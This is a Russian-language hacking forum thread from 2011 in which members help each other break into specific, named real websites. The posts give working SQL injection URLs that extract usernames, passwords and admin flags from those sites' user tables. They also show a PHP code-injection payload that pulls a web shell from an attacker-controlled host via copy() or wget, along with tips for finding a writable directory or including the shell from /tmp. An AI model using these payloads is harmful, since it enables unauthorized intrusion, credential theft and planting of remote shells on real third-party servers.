ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
19.12.2011, 02:42
|
|
Познающий
Регистрация: 18.10.2009
Сообщений: 80
Провел на форуме:
1180165
Репутация:
11
|
|
Здравствуйте, есть RFI (пример _http://www.regentbs.ru/index2.php?id=http://www-sbras.nsc.ru/win/mathpub/page-html ), но возможно инклюдить только .html .
Возможно ли залить шелл ?
|
|
|
19.12.2011, 02:53
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512
Репутация:
0
|
|
wkar, file_get_contents - это не RFI. Можно только читать файлы.
|
|
|
|
19.12.2011, 16:22
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
Всем привет, подскажите почему не выводит нифига?
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//festnevest.ru/photo_php.php?id=6+or+1+group+by+concat%28%28select+email+from+u1419187_alpha.jos_users+limit+1,1%29,floor%28rand%280%29*2%29%29having+min%280%29+or+1--+
[/COLOR][/COLOR]
|
|
|
|
19.12.2011, 16:39
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
Сообщение от Nightmarе
Nightmarе said:
Твоя команда limit+1,1 выводит ВТОРОГО пользователя, а не первого, а в таблице он всего один.
Пруф:
Код:
Code:
http://festnevest.ru/photo_php.php?id=6+or+(@:=1)||@+group+by+concat((select+concat_ws(0x3A,username,0x3a,password,0x3a,usertype)+from+u1419187_alpha.jos_users+limit+0,1),@:=@-1)having+@||min(@:=0)--+
ясно, спасибо
блин, немогу подобрать количество колонок
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.direktor.ru/opinion.htm?id=7+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--+
[/COLOR][/COLOR]
уже закоелебался, хелп, каким софтом ваще их можно подобрать, уже заколебало в ручную
|
|
|
|
19.12.2011, 16:54
|
|
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147
Репутация:
211
|
|
как сюда шелл залить?
http://www.fauna-servis.ua/forum/profile.php?mode=editprofile&e=phpinfo%28%29;
Сообщение от qaz
qaz said:
ясно, спасибо
блин, немогу подобрать количество колонок
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.direktor.ru/opinion.htm?id=7+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--+
[/COLOR][/COLOR]
уже закоелебался, хелп, каким софтом ваще их можно подобрать, уже заколебало в ручную у тебя тут похоже эррор бейсед |
|
|
|
19.12.2011, 17:00
|
|
Guest
Сообщений: n/a
Провел на форуме:
262707
Репутация:
935
|
|
Сообщение от qaz
qaz said:
блин, немогу подобрать количество колонок
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.direktor.ru/opinion.htm?id=7+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--+
[/COLOR][/COLOR]
уже закоелебался, хелп, каким софтом ваще их можно подобрать, уже заколебало в ручную
Код:
Code:
http://www.direktor.ru/opinion.htm?id=7)+and+false+union+select+1,(select(@x)from(select(@x:=0x00),(select(0)from(u13567_doy.userlist)where(0x00)in(@x:=concat(@x,0x3c62723e,Name,0x3a,Pass,0x3a,IsAdmin))))x),3,4,5,6,7,8,9,10,11,12,13,14--+
Сообщение от 547
547 said:
как сюда шелл залить?
http://www.fauna-servis.ua/forum/profile.php?mode=editprofile&e=phpinfo%28%29;
e=copy($_GET[shell],$_GET[save]);&shell=http://ссылка_до_шелла/shell.txt&save=/куда/сохранить/полный/путь/шелл.php
|
|
|
|
19.12.2011, 17:03
|
|
Guest
Сообщений: n/a
Провел на форуме:
124363
Репутация:
11
|
|
Сообщение от 547
547 said:
как сюда шелл залить?
http://www.fauna-servis.ua/forum/profile.php?mode=editprofile&e=phpinfo%28%29;
у тебя тут похоже эррор бейсед
пробуй так
wget http://твой сайт.com/shell.php
или copy("http://твой сайт.com/shell.txt","/твой путь на машине/shell.php")
|
|
|
|
19.12.2011, 17:15
|
|
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147
Репутация:
211
|
|
Сообщение от Expl0ited
Expl0ited said:
e=copy($_GET[shell],$_GET[save]);&shell=http://ссылка_до_шелла/shell.txt&save=/куда/сохранить/полный/путь/шелл.php
не получиться:
Warning: copy(/var/www/faunaservis/fauna-servis.ua/forum/cache/xxx.php) [function.copy]: failed to open stream: Permission denied in /var/www/faunaservis/fauna-servis.ua/forum/includes/usercp_register.php(825) : regexp code(1) : eval()'d code on line 1
я уже что только не пробовал...
fopen,include,file_get_contents,copy.....
|
|
|
|
19.12.2011, 17:17
|
|
Guest
Сообщений: n/a
Провел на форуме:
262707
Репутация:
935
|
|
Сообщение от 547
547 said:
не получиться:
Warning: copy(/var/www/faunaservis/fauna-servis.ua/forum/cache/xxx.php) [function.copy]: failed to open stream: Permission denied in /var/www/faunaservis/fauna-servis.ua/forum/includes/usercp_register.php(825) : regexp code(1) : eval()'d code on line 1
В ошибке же ясно написано Permission denied, ищи директорию на которую хватит прав для записи.
|
|
|
|
19.12.2011, 17:20
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от 547
547 said:
я понимаю, я уже перепробовал директории, не хватает прав, еще идеи будут?
залей шелл в тмп и инклуди, если так хочется
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
